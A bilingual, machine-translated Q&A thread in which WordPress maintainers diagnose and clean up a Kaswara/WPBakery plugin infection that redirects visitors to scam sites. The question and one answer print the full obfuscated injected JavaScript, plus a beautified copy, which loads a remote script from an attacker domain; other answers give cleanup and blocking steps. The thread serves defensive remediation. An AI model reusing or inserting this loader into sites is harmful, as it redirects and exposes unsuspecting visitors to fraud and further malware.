Wordpress WPBakery 和 Kaswara 安全漏洞
[英]Wordpress WPBakery and Kaswara security Vulnerability
问题描述
I have come accross the issue that one of the Wordpress websites I provide maintenance for would strangely redirect the user (unprotected by an AdBlocker) to scam websites.
我遇到了这样一个问题,即我为其提供维护的 Wordpress 网站之一会奇怪地将用户(不受 AdBlocker 保护)重定向到诈骗网站。
The redirection has been done through stick.travelinskydream.ga .重定向是通过stick.travelinskydream.ga完成的。
On a closer check, a script with the following code has been automatically injected into the application.仔细检查后,带有以下代码的脚本已自动注入到应用程序中。 The following code was used:使用了以下代码:
var _0x230d=['getElementsByTagName','script','parentNode','279875vBeEEE','head','698448rkGfeF','679597pxmSpW','281314aeWSVS','1fashtG','currentScript','1439788dxeSnm','src','1051197hJyWzE','277011vIvjKc','2vRLkLk','fromCharCode','1YWwfcj'];var _0x3e5356=_0x567b;function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3['push'](_0x23c6e3['shift']());}catch(_0x227ada){_0x23c6e3['push'](_0x23c6e3['shift']());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37),d=document,s=d['createElement'](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm;document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);
It creates a script tag that executes an external JS code which redirects the user to malicious websites when it loads.它创建一个脚本标签,执行外部 JS 代码,在加载时将用户重定向到恶意网站。 The resulted script looks like:结果脚本如下所示:
<script src="https://stick.travelinskydreams.ga?Brand.js?vid=0000&pidi=191817&id=53646"></script>
From what I've seen, thie vulnerability exists within WpBakery and Kaswara plugins and is a known issue.据我所见,该漏洞存在于 WpBakery 和 Kaswara 插件中,并且是一个已知问题。
https://www.wordfence.com/blog/2020/10/episode-90-wpbakery-plugin-vulnerability-exposes-over-4-million-sites/ https://www.wordfence.com/blog/2020/10/episode-90-wpbakery-plugin-vulnerability-exposes-over-4-million-sites/
https://howtofix.guide/fake-jquery-migrate-plugin/ https://howtofix.guide/fake-jquery-migrate-plugin/
After deactivating and reactivating plugins one by one, the only two culprits remained js_composer (Wp Bakery) and Kaswara.在一个一个停用和重新激活插件之后,唯一的两个罪魁祸首仍然是 js_composer(Wp Bakery)和 Kaswara。 I have tried updating these two plugins, but the "infection" remained, even though patches have been released for this issue.我已经尝试更新这两个插件,但“感染”仍然存在,即使已针对此问题发布了补丁。
6 个解决方案
解决方案1
2 2021-04-27 18:48:49
Just found this option with a BASE64 encoded JS Script.刚刚使用 BASE64 编码的 JS 脚本找到了这个选项。 Find and delete it.找到并删除它。
Look for this entrie on you WP_OPTIONS table在您的 WP_OPTIONS 表上查找此条目
Whats happenning here?这里发生了什么?
This malware is a Javascript content witch triggers the GET travelinski stuff brand.js.该恶意软件是 Javascript 内容,可触发 GET travelinski stuff brand.js。
It's content is encoded in BASE64 to disrupt its detection by SH or Select Query.它的内容编码在 BASE64 中,以扰乱 SH 或 Select 查询对其的检测。 When invoked into the screen it become a executable snippet.当被调用到屏幕中时,它成为一个可执行的片段。
It may appear under different an option_name, but the content itself must not change that much.它可能出现在不同的 option_name 下,但内容本身不能有太大变化。
解决方案2
1 2021-04-28 11:14:14
So anyone looking for this issue, here is the reason and the solution.所以任何寻找这个问题的人,这里是原因和解决方案。
Reason原因
Plugins: WP-Bakery (JS Composer) and Kaswara Plugins are having this issue.插件:WP-Bakery (JS Composer) 和 Kaswara 插件有这个问题。
Solution解决方案
You need to remove one entry from your wp_options table.您需要从 wp_options 表中删除一项。
- First login to cPanel.首先登录到cPanel。
- Go to PHPMYADMIN Go 至 PHPMYADMIN
- Select the database of your website (which has the issue) Select 您网站的数据库(有问题)
- Then go to wp_options table.然后 go 到 wp_options 表。
- As my friend Andre mentioned the entry could be with different wp_option_name.正如我的朋友 Andre 提到的,该条目可能具有不同的 wp_option_name。
- You need to enter JS in the Filter Rows input field.您需要在Filter Rows输入字段中输入JS 。
- It will give you results, now look for option_value that starts with: dmFyIF它会给你结果,现在寻找以: dmFyIF开头的 option_value
- Delete that entry, and you're all done.删除该条目,您就完成了。
解决方案3
0 2021-04-27 13:42:42
The resolution was simple enough: after hours, inside Wordpress Dashboard, in the Kaswara menu > custom code sections, the very code that has been presented in the question was there.解决方案很简单:几小时后,在 Wordpress 仪表板中,在 Kaswara 菜单 > 自定义代码部分中,问题中出现的代码就在那里。 After deleting it, everything returned to normal.删除后,一切恢复正常。
It is surely not the only way such malware can destroy work, so I am appending this link with other possible effects.这肯定不是此类恶意软件破坏工作的唯一方式,因此我在此链接中附加了其他可能的影响。
https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/ https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/
A potential workaround that worked for me was adding this custom script that would remove the malicious JS after it has loaded (temporary solution, does not remove the virus) :一个对我有用的潜在解决方法是添加此自定义脚本,该脚本将在加载后删除恶意 JS (临时解决方案,不会删除病毒) :
$('script').each(function(index, obj) {
console.log(index, obj);
if (obj.src === 'https://stick.travelinskydream.ga/brand.js&v=0032&sid=236&pid=545747') {
$(this).remove();
console.log($(this).text());
}
if ($(this).text() === "var _0x230d=['getElementsByTagName','script','parentNode','279875vBeEEE','head','698448rkGfeF','679597pxmSpW','281314aeWSVS','1fashtG','currentScript','1439788dxeSnm','src','1051197hJyWzE','277011vIvjKc','2vRLkLk','fromCharCode','1YWwfcj'];var _0x3e5356=_0x567b;function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3['push'](_0x23c6e3['shift']());}catch(_0x227ada){_0x23c6e3['push'](_0x23c6e3['shift']());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37),d=document,s=d['createElement'](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm;document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);") {
$(this).remove()
}
Here is the "beautified" malicious code of the injected JS, maybe it will help someone.这是注入的JS的“美化”恶意代码,也许它会对某人有所帮助。
var _0x3e5356 = _0x567b;
function _0x567b(_0x4f69c6, _0x44f06a) {
_0x4f69c6 = _0x4f69c6 - 0x161;
var _0x230d0d = _0x230d[_0x4f69c6];
return _0x230d0d;
}(function(_0x23c6e3, _0x4b8159) {
var _0x137209 = _0x567b;
while (!![]) {
try {
var _0x388290 = -parseInt(_0x137209(0x168)) * parseInt(_0x137209(0x16a)) + parseInt(_0x137209(0x16f)) + -parseInt(_0x137209(0x165)) * -parseInt(_0x137209(0x161)) + -parseInt(_0x137209(0x16c)) + parseInt(_0x137209(0x167)) + parseInt(_0x137209(0x16e)) + -parseInt(_0x137209(0x170)) * -parseInt(_0x137209(0x169));
if (_0x388290 === _0x4b8159) break;
else _0x23c6e3['push'](_0x23c6e3['shift']());
} catch (_0x227ada) {
_0x23c6e3['push'](_0x23c6e3['shift']());
}
}
}(_0x230d, 0xb70ce));
var mm = String[_0x3e5356(0x171)](0x68, 0x74, 0x74, 0x70, 0x73, 0x3a, 0x2f, 0x2f, 0x73, 0x74, 0x69, 0x63, 0x6b, 0x2e, 0x74, 0x72, 0x61, 0x76, 0x65, 0x6c, 0x69, 0x6e, 0x73, 0x6b, 0x79, 0x64, 0x72, 0x65, 0x61, 0x6d, 0x2e, 0x67, 0x61, 0x2f, 0x62, 0x72, 0x61, 0x6e, 0x64, 0x2e, 0x6a, 0x73, 0x26, 0x76, 0x3d, 0x30, 0x30, 0x33, 0x32, 0x26, 0x73, 0x69, 0x64, 0x3d, 0x32, 0x33, 0x36, 0x26, 0x70, 0x69, 0x64, 0x3d, 0x35, 0x34, 0x35, 0x37, 0x34, 0x37),
d = document,
s = d['createElement'](_0x3e5356(0x163));
s[_0x3e5356(0x16d)] = mm;
document[_0x3e5356(0x16b)] ? document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s, document[_0x3e5356(0x16b)]) : d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);
If you find anything else or have been affected by this, please share your solutions!如果您发现任何其他问题或受到此影响,请分享您的解决方案!
解决方案4
0 2021-05-01 07:55:50
After you clean your site removing the extrajs in kaswara and perform a full scan with wordfence then:清理站点后,删除 kaswara 中的 extrajs 并使用 wordfence 执行完整扫描,然后:
For every wordfence freemium users who tries to fix this issue before the 21st May I suggest to:对于在 5 月 21 日之前尝试解决此问题的每个 wordfence 免费增值用户,我建议:
In the wordfence-waf.php put these line just one line after the <?php tag:在 wordfence-waf.php 中,将这些行放在 <?php 标签之后的一行:
if(!empty($_GET['action']) && $_GET['action'] == 'uploadFontIcon'){
die('Good luck');
}
Then when you receive the wordfence update on 21st May revert back as the original然后,当您在 5 月 21 日收到 wordfence 更新时,恢复为原始状态
解决方案5
0 2021-05-13 03:09:26
Thank you very much for this.非常感谢你。 I had my website infected with this and after restoring from backup, only to see if reinfected 2 weeks later.我的网站感染了这个,在从备份中恢复后,才看到 2 周后是否再次感染。 Found the db entry and also saw the script in the custom settings of kaswara.找到了 db 条目,还看到了 kaswara 的自定义设置中的脚本。 I'll see how best I can substitute what I used it for and then delete it.我会看看我能用它代替什么,然后删除它。
Any idea how they got in?知道他们是怎么进来的吗? Is there an htaccess directive I can add to block them?我可以添加一个 htaccess 指令来阻止它们吗?
I found this report and went digging and found a p.php file uploaded 8 days ago in the kaswara icons folder /uploads/kaswara/icon/slt我找到了这份报告并进行了挖掘,并在 kaswara 图标文件夹 /uploads/kaswara/icon/slt 中找到了 8 天前上传的 p.php 文件
https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5
解决方案6
0 2021-05-28 12:23:19
After removing the kaswara plugin, go to mysql maybe via phpmyadmin, find the wp_options table and delete kasvaracustomjs option_name删除 kaswara 插件后,go 到 mysql 可能通过 phpmyadmin,找到 wp_options 表并删除 kasvaracustomjs 选项
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.